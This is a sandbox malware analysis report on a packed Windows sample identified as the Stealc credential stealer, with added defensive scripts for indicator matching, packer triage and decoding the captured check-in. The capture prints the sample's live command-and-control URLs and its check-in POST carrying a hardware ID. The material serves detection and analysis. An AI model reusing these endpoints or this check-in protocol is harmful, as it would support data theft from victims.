Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | Create Account (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Native API (13) | DLL Side-Loading (1) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (33) | LSASS Memory | Security Software Discovery (641) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (33) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (12) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (324) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label
file.exe | 39% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches for dropped files, unpacked PE files or domains
Source | Detection | Scanner | Label
http://185.215.113.206/c4becf79229cb002.phpKZ | 100% | Avira URL Cloud | malware
http://185.215.113.206/ninet.dll | 100% | Avira URL Cloud | malware
              No contacted domains info
Contacted URLs: Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high
URLs from memory and binary strings: Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206 | file.exe, 00000000.00000002.1518473176.00000000015CE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/ninet.dll | file.exe, 00000000.00000002.1518473176.00000000015ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/8 | file.exe, 00000000.00000002.1518473176.0000000001629000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpKZ | file.exe, 00000000.00000002.1518473176.00000000015CE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
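The contacted IP and the two URLs above are this report's network indicators. The Python below is an added example, not part of the Joe Sandbox report: it matches proxy log lines against them and adds one labelled heuristic, HTTP to a bare public IPv4 host for a .php or .dll path, which is the shape of both requests here. The log excerpt and the internal address ranges are constructed for the example.

```python
import ipaddress
from urllib.parse import urlsplit

# Network indicators from this report.
C2_IP = "185.215.113.206"
C2_URLS = {
    "http://185.215.113.206/c4becf79229cb002.php",   # gate the sample POSTs to
    "http://185.215.113.206/ninet.dll",              # DLL the sample requests
}

# Address ranges treated as internal so that intranet apps on bare IPs do not
# trip the heuristic below (constructed list; adjust to the environment).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed proxy log excerpt: timestamp, client, method, URL, status.
SAMPLE_LOG = """\
1732444331 10.0.0.15 POST http://185.215.113.206/c4becf79229cb002.php 200
1732444332 10.0.0.15 GET http://185.215.113.206/ninet.dll 200
1732444340 10.0.0.22 GET http://www.example.com/index.php 200
1732444345 10.0.0.31 GET http://203.0.113.7/update.dll 404
1732444347 10.0.0.31 GET http://10.0.0.5/intranet.php 200
1732444350 10.0.0.15 GET https://login.microsoftonline.com/ 200
"""


def _ip_literal(host: str):
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        return None


def check_url(url: str) -> list:
    """Reasons a URL should be flagged, most specific first."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    reasons = []
    if url in C2_URLS:
        reasons.append("c2_url")
    if host == C2_IP:
        reasons.append("c2_ip")
    ip = _ip_literal(host)
    if (ip is not None
            and not any(ip in net for net in INTERNAL_NETS)
            and parts.path.lower().endswith((".php", ".dll"))):
        reasons.append("ip_literal_host")   # heuristic, review before blocking
    return reasons


def scan_log(text: str) -> list:
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 4:
            continue
        reasons = check_url(fields[3])
        if reasons:
            findings.append({"line": lineno, "client": fields[1],
                             "url": fields[3], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']:>2} {f['client']:<12} {','.join(f['reasons']):<32} {f['url']}")
```

The exact URL and IP matches are safe to alert on as they stand; the ip_literal_host heuristic is noisy and the internal-range list is the knob to tune before it goes anywhere near a blocking rule. Note that the report itself lists the gate URL with Malicious: false while Avira URL Cloud rates it malware, so the reputation column alone is not a reason to drop the indicator.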
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1561817
                      Start date and time:2024-11-24 11:32:11 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 4m 18s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:6
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 79%
                      • Number of executed functions: 18
                      • Number of non-executed functions: 120
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: file.exe
                      No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 (IP) | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 (IP) | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 (IP) | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 (IP) | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 (IP) | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 (IP) | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 (IP) | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 (IP) | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 (IP) | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 (IP) | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL (ASN) | file.exe | malicious | LummaC Stealer | 185.215.113.16
WHOLESALECONNECTIONSNL (ASN) | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL (ASN) | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL (ASN) | file.exe | malicious | LummaC Stealer | 185.215.113.16
WHOLESALECONNECTIONSNL (ASN) | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL (ASN) | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL (ASN) | file.exe | malicious | LummaC Stealer | 185.215.113.16
WHOLESALECONNECTIONSNL (ASN) | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL (ASN) | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL (ASN) | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar | 185.215.113.206
                      No context
                      No context
                      No created / dropped files found
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.944465366904774
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'790'976 bytes
                      MD5:6ae8d6dbe0f7340866c08c3f7b65978a
                      SHA1:b1afeaa2019c2df5c0be69191ed9c91ba0af72cd
                      SHA256:425637dfc7232d7373898820b23226d268bf36496b766b5e367a06855864549f
                      SHA512:b813ff37f5d50473cc7c874eb35656c1faee5fb21e3f67c235c68553aab7769d87021c1c70efc2259470ce7a2f9399191d7b73c0ccf20bceb2b6946bc5e34961
                      SSDEEP:24576:8Y+gq4ZwFfNQ+eMiqVrQq+7HFycKspltUVyY2m6JfYNEor14HJ/uH+xW6CS6fzkL:8YqLFS+ec0HFyDspbu6JLOcnbEzo874
                      TLSH:ED8533445FBFEA81DC528A7100BBB71119FFF28E9864CF270AD615B92C0ADAD65704CB
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                      Icon Hash:00928e8e8686b000
                      Entrypoint:0xa8f000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction (entry-point disassembly; consecutive identical lines collapsed with a repeat count)
jmp 00007F11A0BA7FAAh
rdmsr
sbb eax, dword ptr [eax]
add byte ptr [eax], al  (x2)
jmp 00007F11A0BA9FA5h
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al  (x2)
add byte ptr [eax], dh
add byte ptr [eax], al  (x11)
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al  (x62)
add byte ptr [eax], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al  (x2)
adc byte ptr [eax], al
add byte ptr [eax], al  (x3)
push es
or al, byte ptr [eax]
add byte ptr [eax], al  (x2)
                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x249000 | 0x16200 | 32b7da6f4b98ae7788bd471298ef9cc0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24a000 | 0x2b0 | 0x200 | 13ed861c59573d58e38d00fd6a740e7b | False | 0.796875 | data | 6.003009286417348 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x24c000 | 0x2a6000 | 0x200 | fc2fb46f39e6e9f88c3625184ecd90e5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
kzyuzjct | 0x4f2000 | 0x19c000 | 0x19b600 | a7585b1cbc993442594498f37a045b15 | False | 0.9946100634305682 | data | 7.953368185260934 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xpspqxsm | 0x68e000 | 0x1000 | 0x400 | 6761d65c5a80929301d337e333802bd4 | False | 0.71484375 | data | 5.66147292257423 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x68f000 | 0x3000 | 0x2200 | c6d6414363faa99890fb528c3fa547f7 | False | 0.061810661764705885 | DOS executable (COM) | 0.750944389184004 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x68d2b0 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
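The static data above carries the classic packer profile: the entry point sits in .taggant rather than a code section, five of seven sections are readable, writable and executable, two sections have no name, two sections are almost entirely virtual (a 2.3 MB and a 2.7 MB VirtualSize backed by 0x16200 and 0x200 raw bytes, where an unpacking stub would write the decrypted payload), kzyuzjct has an entropy of 7.95, and the whole import table is a single kernel32!lstrcpy. The script below is an added example, not part of the Joe Sandbox report or of the sample: it applies those indicators as code and maps the runtime address of a Yara hit back to its static section. The section values, preferred image base 0x400000, entry point 0xa8f000, runtime image base 0x900000 (from the process table) and the import are transcribed from this report, with entropies rounded to three decimals; the thresholds (entropy >= 7.2, at least 64 KiB of virtual-only space, at most 3 imports) are the author's assumptions and not values from the report.

```python
"""Static triage of a PE section table using only the standard library."""
from dataclasses import dataclass
from typing import Optional

# IMAGE_SECTION_HEADER.Characteristics bits (winnt.h)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
STANDARD_CODE_SECTIONS = {".text", "CODE", ".code"}


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int      # RVA
    virtual_size: int
    raw_size: int
    characteristics: int
    entropy: Optional[float]  # None where the report printed "unknown"

    @property
    def label(self) -> str:
        return self.name or f"<unnamed @ {self.virtual_address:#x}>"

    def contains_rva(self, rva: int) -> bool:
        return self.virtual_address <= rva < self.virtual_address + self.virtual_size


# Transcribed from this report's section table, PE header, process table and import list.
PREFERRED_IMAGE_BASE = 0x400000
ENTRY_POINT_VA = 0xA8F000
RUNTIME_IMAGE_BASE = 0x900000           # ASLR-relocated base seen at run time
IMPORTS = {"kernel32.dll": ["lstrcpy"]}
_DATA_RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
_DATA_RWX = _DATA_RW | IMAGE_SCN_MEM_EXECUTE
SECTIONS = [
    Section("",         0x001000, 0x249000, 0x016200, _DATA_RWX, None),
    Section(".rsrc",    0x24A000, 0x0002B0, 0x000200, _DATA_RW,  6.003),
    Section(".idata",   0x24B000, 0x001000, 0x000200, _DATA_RW,  0.865),
    Section("",         0x24C000, 0x2A6000, 0x000200, _DATA_RWX, None),
    Section("kzyuzjct", 0x4F2000, 0x19C000, 0x19B600, _DATA_RWX, 7.953),
    Section("xpspqxsm", 0x68E000, 0x001000, 0x000400, _DATA_RWX, 5.661),
    Section(".taggant", 0x68F000, 0x003000, 0x002200, _DATA_RWX, 0.751),
]


def section_for_rva(sections, rva):
    """Section whose virtual range covers the RVA, or None (headers / gaps)."""
    return next((s for s in sections if s.contains_rva(rva)), None)


def triage(sections, image_base, entry_va, imports, *,
           min_entropy=7.2, min_slack=0x10000, max_imports=3):
    """Packer indicators keyed by category; each value is a list of section labels."""
    out = {k: [] for k in ("entry_point", "unnamed_sections", "rwx_sections",
                           "unpacking_targets", "high_entropy", "sparse_imports")}
    ep = section_for_rva(sections, entry_va - image_base)
    if ep is None:
        out["entry_point"].append("<outside all sections>")
    elif ep.name not in STANDARD_CODE_SECTIONS or not ep.characteristics & IMAGE_SCN_CNT_CODE:
        out["entry_point"].append(ep.label)          # entry point in a non-code section
    for s in sections:
        if not s.name:
            out["unnamed_sections"].append(s.label)
        if s.characteristics & RWX == RWX:
            out["rwx_sections"].append(s.label)
        # Far more VirtualSize than raw bytes: room reserved for a decrypted payload.
        # The 64 KiB floor (assumption) keeps ordinary alignment padding out.
        if s.virtual_size - s.raw_size >= min_slack:
            out["unpacking_targets"].append(s.label)
        if s.entropy is not None and s.entropy >= min_entropy:
            out["high_entropy"].append(s.label)
    names = [f"{dll}!{fn}" for dll, fns in imports.items() for fn in fns]
    if len(names) <= max_imports:                    # real imports resolved at run time
        out["sparse_imports"] = names
    return out


def map_runtime_address(addr, runtime_base=RUNTIME_IMAGE_BASE, sections=SECTIONS):
    """Map an address from a memory dump back to the static section via its RVA."""
    s = section_for_rva(sections, addr - runtime_base)
    return s.label if s else None


if __name__ == "__main__":
    for category, hits in triage(SECTIONS, PREFERRED_IMAGE_BASE, ENTRY_POINT_VA, IMPORTS).items():
        print(f"{category:18} {hits}")
    print("Yara hit region 0x901000 lies in section:", map_runtime_address(0x901000))
```

The last line ties the static and dynamic halves of the report together: the Yara Stealc match on the 0x901000 dump region is RVA 0x1000 under the relocated base, which is the first unnamed section, i.e. the payload was unpacked into the section the stub had reserved for it.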
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-24T11:33:32.820692+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.7 | 49704 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 24, 2024 11:33:30.894998074 CET | 49704 | 80 | 192.168.2.7 | 185.215.113.206
Nov 24, 2024 11:33:31.014731884 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.7
Nov 24, 2024 11:33:31.014822960 CET | 49704 | 80 | 192.168.2.7 | 185.215.113.206
Nov 24, 2024 11:33:31.032118082 CET | 49704 | 80 | 192.168.2.7 | 185.215.113.206
Nov 24, 2024 11:33:31.151851892 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.7
Nov 24, 2024 11:33:32.364613056 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.7
Nov 24, 2024 11:33:32.364778996 CET | 49704 | 80 | 192.168.2.7 | 185.215.113.206
Nov 24, 2024 11:33:32.367772102 CET | 49704 | 80 | 192.168.2.7 | 185.215.113.206
Nov 24, 2024 11:33:32.487593889 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.7
Nov 24, 2024 11:33:32.817598104 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.7
Nov 24, 2024 11:33:32.820692062 CET | 49704 | 80 | 192.168.2.7 | 185.215.113.206
Nov 24, 2024 11:33:37.822437048 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.7
Nov 24, 2024 11:33:37.822521925 CET | 49704 | 80 | 192.168.2.7 | 185.215.113.206
Nov 24, 2024 11:33:38.025295019 CET | 49704 | 80 | 192.168.2.7 | 185.215.113.206
                      • 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49704 | 185.215.113.206 | 80 | 7476 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 11:33:31.032118082 CET | 90 | OUT | GET / HTTP/1.1
                      Host: 185.215.113.206
                      Connection: Keep-Alive
                      Cache-Control: no-cache
Nov 24, 2024 11:33:32.364613056 CET | 203 | IN | HTTP/1.1 200 OK
                      Date: Sun, 24 Nov 2024 10:33:32 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
Nov 24, 2024 11:33:32.367772102 CET | 413 | OUT | POST /c4becf79229cb002.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBG
                      Host: 185.215.113.206
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 46 39 41 46 42 33 31 30 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a
Data Ascii (CRLF line structure restored from the raw bytes):
------CBKFIECBGDHJKECAKFBG
Content-Disposition: form-data; name="hwid"

2DF9AFB310603810289448
------CBKFIECBGDHJKECAKFBG
Content-Disposition: form-data; name="build"

mars
------CBKFIECBGDHJKECAKFBG--
Nov 24, 2024 11:33:32.817598104 CET | 210 | IN | HTTP/1.1 200 OK
                      Date: Sun, 24 Nov 2024 10:33:32 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64; decodes to "block"). No further HTTP requests follow in the capture and the process has exited (see the process table below), so the remainder of the Stealc check-in sequence was not observed in this run.
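The exchange above is the whole of the observed C2 dialogue: an empty GET / as a reachability probe, then one multipart/form-data POST to /c4becf79229cb002.php carrying a hwid and a build field, answered by an 8-byte base64 string. The script below is an added example and not part of the Joe Sandbox report or of the sample: it parses the captured body the way a proxy or IDS post-processor would, checks the Content-Length framing, and decodes the reply. The request body hex, the Content-Type boundary, the Content-Length and the reply bytes are copied from the capture; the looks_like_stealc_checkin heuristic is derived from this single exchange and is an assumption for triage, not a Stealc signature.

```python
"""Decode a captured Stealc check-in: multipart body fields and the base64 reply."""
import base64
import binascii
import re

# Copied from the report: Content-Type of the POST, its 211-byte body ("Data Raw")
# and the 8-byte response body.
CAPTURED_CONTENT_TYPE = "multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBG"
CAPTURED_CONTENT_LENGTH = 211
CAPTURED_BODY_HEX = (
    "2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 "
    "3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a "
    "32 44 46 39 41 46 42 33 31 30 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a "
    "2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 "
    "3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a "
    "6d 61 72 73 0d 0a "
    "2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a"
)
CAPTURED_BODY = bytes.fromhex(CAPTURED_BODY_HEX)
CAPTURED_REPLY = bytes.fromhex("59 6d 78 76 59 32 73 3d")


def parse_multipart_form(body: bytes, content_type: str) -> dict:
    """Minimal RFC 2046 multipart/form-data parser: {field name: raw value bytes}."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary parameter")
    delimiter = b"\r\n--" + m.group(1).encode("ascii")
    fields = {}
    # The CRLF preceding every boundary belongs to the delimiter; prepending one
    # lets the first boundary split exactly like the others.
    for part in (b"\r\n" + body).split(delimiter)[1:]:
        if part.startswith(b"--"):                 # closing delimiter "--boundary--"
            break
        if not part.startswith(b"\r\n"):
            raise ValueError("malformed part: boundary not followed by CRLF")
        headers, sep, value = part[2:].partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("part without a blank line between headers and body")
        name = re.search(rb'name="([^"]*)"', headers)
        if name is None:
            raise ValueError("part without a name= parameter")
        fields[name.group(1).decode("ascii")] = value
    return fields


def decode_checkin(body=CAPTURED_BODY, content_type=CAPTURED_CONTENT_TYPE,
                   content_length=CAPTURED_CONTENT_LENGTH) -> dict:
    """Check the framing, then return the check-in fields as text."""
    if len(body) != content_length:
        raise ValueError(f"body is {len(body)} bytes, Content-Length says {content_length}")
    return {k: v.decode("ascii") for k, v in parse_multipart_form(body, content_type).items()}


def decode_c2_reply(raw: bytes) -> str:
    """The reply seen in the capture is base64 ASCII; strict decoding rejects anything else."""
    try:
        return base64.b64decode(raw, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"reply is not base64 ASCII: {raw!r}") from exc


def looks_like_stealc_checkin(fields: dict) -> bool:
    """Heuristic (assumption from this one capture): exactly hwid + build, hwid upper-case hex."""
    return (set(fields) == {"hwid", "build"}
            and re.fullmatch(r"[0-9A-F]+", fields["hwid"]) is not None)


if __name__ == "__main__":
    fields = decode_checkin()
    print("check-in fields:", fields)
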